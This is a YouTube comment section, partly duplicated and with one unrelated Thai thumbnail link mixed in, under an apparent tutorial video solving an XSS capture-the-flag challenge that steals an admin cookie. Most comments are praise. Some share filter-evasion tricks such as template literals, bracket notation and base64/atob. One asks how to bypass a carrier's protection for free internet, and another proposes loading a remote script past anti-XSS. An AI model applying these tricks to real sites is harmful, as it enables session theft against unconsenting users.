I love how John teaches the subject. He most likely already knows the answer, but knows that showing the methodology is more important. Trying different things, failing sometimes, then finally winning, are what makes a good hacker.
I know it's old but I've been binging your videos and bro, just amazing. The use of python to wreck like everything makes me sooo sooo happy.. I've literally understood coding 1000% better just watching your content.
New to your channel but eating it up. I’m not a security guy or a CS/SE major or anything, I just like computers and find these videos so interesting. I could never solve these boxes by myself but the way you present these solutions makes it FEEL like I could have come to the same conclusions myself. I think that’s a hallmark of a great teacher, keep it up!
I know I'm late on this one, but I'm just binging on your old stuff at 2:30am. The backticks allow you to use ES6 syntax to create a template literal, previously referred to as a template string I believe. So instead of: var name = "Nick" var output = "My name is" + name alert(output) // outputs "My name is Nick" We can use name and change output to: var output = `My name is ${name}` Our alert will produce the same result without needing to concatenate the string and variable and eliminates the need for using quotes for the string. This is a very simple example, but when you need to concatenate a lot of stuff it saves a bunch of time. It also apparently helps to make this attack work which is super cool.
The way you were using python..mind boggling...Please if possible do make a tutorials on Python and Javascript for Pentesters or Bug Hunters. Thank You for bringing the great content. Love
Amazing video man !! new sub and like , more XSS videos !!!! Do you give a course on udemy or something like that on web hacking? If not, it would be great, we would all buy it
Hey John, wondering if you can expand on your CORS comments from the end of the video. You mention that when a script from the target site tries to reach out to the attacker's site, you can see a CORS error. However, isn't that error entirely in the attacker's control? Couldn't you have returned the right CORS headers from your server to allow the request through?
@@_JohnHammond If your router allows this. Unfortunately most DSL routers you get from your provider here in Germany won't allow open ports at all. All that mine offers externally is VPN access into my home network. But you can't open up any ports like for a local running web server to be accessible from the outside. And even more unfortunately with most providers you can't even replace the router with something of your choice, as your account is linked to the router's serial number and it won't connect with another device. With some providers you don't even get a true IP that can be reached normally from the internet, like some provder level NAT. I guess we drew the short straw. ;-) The most crappy thing is that a very popular router model with the stock firmware would allow all of that, but provider customization removed these features for "enhanced customer security".
Couldn't you just do "document.cookie" with the browser dev tools? Why create a script to send this info to your server? To whom actually belong that session?
trying encode but getting this one Traceback (most recent call last): File "/home/bango/Desktop/project.py", line 10, in payload = base64.b64encode(payload) File "/usr/lib/python3.8/base64.py", line 58, in b64encode encoded = binascii.b2a_base64(s, newline=False) TypeError: a bytes-like object is required, not 'str'
You are out of free articles? Looks like a div overlay thing with a css blur filter on the article below. Some sites actually used to use that (now they use mostly a blurred generic background), suffice to say I never had trouble reading the articles. In chrome, dev tools, remove element (the overlay), then disable any css blur effects, and enable y-overflow (a lot stop you from scrolling the page too). Submit article, does it appear rendered to other users? Next thing is try to enter something that confuses their anti xss system into displaying what you need. You can view page source to check for any odd effects. If you can get an external script into a src attribute somehow, then host it remotely would be a good trick to play.
Your videos are priceless. You don't just show the attack but also the process and the evolving of ideas while designing the attack. Premium content, thank you really.
![[UNCUT] ขยี้ "อลิส" ปม "คลิปลับแตงโม" เปิดชื่อคนพยายามแฮก "มือถือแตงโม" I คนดังนั่งเคลียร์I 10ก.พ.68](http://i.ytimg.com/vi/_RPLEIi5Sz8/mqdefault.jpg)
I love how John teaches the subject. He most likely already knows the answer, but knows that showing the methodology is more important. Trying different things, failing sometimes, then finally winning, are what makes a good hacker.
I know it's old but I've been binging your videos and bro, just amazing. The use of python to wreck like everything makes me sooo sooo happy.. I've literally understood coding 1000% better just watching your content.
One of best ctf question i’ve ever seen so far. Also great solution! Congrats John
New to your channel but eating it up. I’m not a security guy or a CS/SE major or anything, I just like computers and find these videos so interesting. I could never solve these boxes by myself but the way you present these solutions makes it FEEL like I could have come to the same conclusions myself. I think that’s a hallmark of a great teacher, keep it up!
This was very interesting! More of this (:
Your videos have been great to watch while I’m stuck in a tractor away from my laptop
I would have never thought about that base64 and atob(), nice little trick to bypass filters to keep in my pocket! Great fun lab!
I just stuck to the screen when I saw you used python to do injections. so cool. you have a unique method I haven't seen elsewhere. go python in BB!
incredible sir i really loved it and please keep coming these videos
13:30 You can call functions using square brackets notation instead of a period.
String.fromCharCode -> String['fromCharCode']
@@GiQQ Oh, you are right. How about using slash string instead of single quote?
same lol
Haha from js dev perspective template literals(backticks) were the first thing that came to my mind when you were searching for string without quotes.
Me too !
"hit the dislike button twice" - just when I though you couldn't be any more clever... kudos to you sir.
Ha! I think that is a common joke among TH-camrs. :) Thanks so much for watching!
Binging on your content. Love seeing your thought process as you run into roadblocks.
This was so informative and beautiful in a short video 👌
I see myself there doing PT with my client application finding all possible xyz. Exactly, I got that PT feel bro..🍻🔥
el verdadero proceso de un hacker , investigar , persistir , evadir los obstaculos .... te ganaste un subscriptor bro , buen video
I know I'm late on this one, but I'm just binging on your old stuff at 2:30am. The backticks allow you to use ES6 syntax to create a template literal, previously referred to as a template string I believe.
So instead of:
var name = "Nick"
var output = "My name is" + name
alert(output) // outputs "My name is Nick"
We can use name and change output to:
var output = `My name is ${name}`
Our alert will produce the same result without needing to concatenate the string and variable and eliminates the need for using quotes for the string. This is a very simple example, but when you need to concatenate a lot of stuff it saves a bunch of time. It also apparently helps to make this attack work which is super cool.
You are amazing 😀
Wowww, that was awesome!!!!!
really enjoyed this!!!
Again amazing video. Every day i'm checking youtube and looking forward your next one :)). Great job, keep going ;)
That was so epic man 🤘🏼🤘🏼
This is awesome.
Best of its kind
Thanks so much mentor
The way you were using python..mind boggling...Please if possible do make a tutorials on Python and Javascript for Pentesters or Bug Hunters.
Thank You for bringing the great content. Love
I love how you approach the problem... it is excellent..
also how do you get the output of python in new window.. by default it opens in a panel...
Dude quality stuff 👌👌👌
That ad at 18 minutes was 🤌🏼
Youre amazing..Period.
Thanks so much! And thanks for watching!
I quite enjoyed that.
Man, john looking forward to "python primer for hackers!" great stuff keep it up.
You are just awesome bro !!!!!!!!!!!!
this is amazing man
Love your work bro❤️❤️
17:00 base64 also have forward slash, thats why i think it didnt work.
which package are you using 6:35 for Build Output tab ?
Amazing video man !! new sub and like , more XSS videos !!!!
Do you give a course on udemy or something like that on web hacking? If not, it would be great, we would all buy it
That Was awesome
When you submitted the URL you just were hoping that an admin/moderator would click on that link? Or how did you get that cookie
Yup that's correct. Typically in a CTF challenge there will be an automated browser that will access what you submit with and admin session.
Awesome 👍
`b to a` and `a to b`
Thank's Bro i really learn New techniques every Time i watche Your Vedeos I wish If you Teach us how to hunt bulk url's and work with bulk 😁😁😁✔
amazing
What I would do is make the string the fragment and pull it from there
Cool🤩
sir start a series on python like solving CTF on python its gonna be really fun ❤
TIL: he doesn't know javascript syntax
This was actually so cool lol
Hey John, wondering if you can expand on your CORS comments from the end of the video. You mention that when a script from the target site tries to reach out to the attacker's site, you can see a CORS error. However, isn't that error entirely in the attacker's control? Couldn't you have returned the right CORS headers from your server to allow the request through?
great video and I love your unique way in solving the challenge with python but couldn't you have don all this with burp suite ?
Watch the article in incognito mode for medium
love this can you suggest any other XSS ctfs?
you gotta add "JOIN" button for content exclusive to your members, i reckon it would be totally worth it.
Very nice. Wonder if it’s a bot clicking on the links you submit or an actual person
seeing you hacking made me love hacking very much.
Where u learn python for cyber security
Can anyone explain how he made a request sending the dictionary and it injected the code?
Great video.I want to block my mobile carrirer xss protection to have free internet.give me an idea please.
So basically if you don't have a server on the internet, you're SOL?
No, you can use ngrok and tunnel out a local listener, and you don't need a server on the internet for that.
@@_JohnHammond If your router allows this. Unfortunately most DSL routers you get from your provider here in Germany won't allow open ports at all. All that mine offers externally is VPN access into my home network. But you can't open up any ports like for a local running web server to be accessible from the outside. And even more unfortunately with most providers you can't even replace the router with something of your choice, as your account is linked to the router's serial number and it won't connect with another device. With some providers you don't even get a true IP that can be reached normally from the internet, like some provder level NAT. I guess we drew the short straw. ;-)
The most crappy thing is that a very popular router model with the stock firmware would allow all of that, but provider customization removed these features for "enhanced customer security".
I think I have to leave bash and start python🐍🐍
Teacher
What is your primary job? I noticed you have to be in mil to do this challenge. I'm in the Army myself
can you make a video how to make different types of payloads?
What extension is that in sublime
Couldn't you just do "document.cookie" with the browser dev tools? Why create a script to send this info to your server?
To whom actually belong that session?
🤦♂️
♥️
trying encode but getting this one Traceback (most recent call last):
File "/home/bango/Desktop/project.py", line 10, in
payload = base64.b64encode(payload)
File "/usr/lib/python3.8/base64.py", line 58, in b64encode
encoded = binascii.b2a_base64(s, newline=False)
TypeError: a bytes-like object is required, not 'str'
i added payload = base64.b64encode(payload.encode('utf-8'))
Nice()
Man 😍
meme review 👏👏
You are out of free articles? Looks like a div overlay thing with a css blur filter on the article below. Some sites actually used to use that (now they use mostly a blurred generic background), suffice to say I never had trouble reading the articles. In chrome, dev tools, remove element (the overlay), then disable any css blur effects, and enable y-overflow (a lot stop you from scrolling the page too). Submit article, does it appear rendered to other users? Next thing is try to enter something that confuses their anti xss system into displaying what you need. You can view page source to check for any odd effects. If you can get an external script into a src attribute somehow, then host it remotely would be a good trick to play.
Comment written before watching the entire video, just in case anyone wondered.
I rather had idea lile h1 on dom content full load do function :3
Bro where script code phyton this video
Bro how are u today? I am anonymous haha
Your videos are priceless. You don't just show the attack but also the process and the evolving of ideas while designing the attack.
Premium content, thank you really.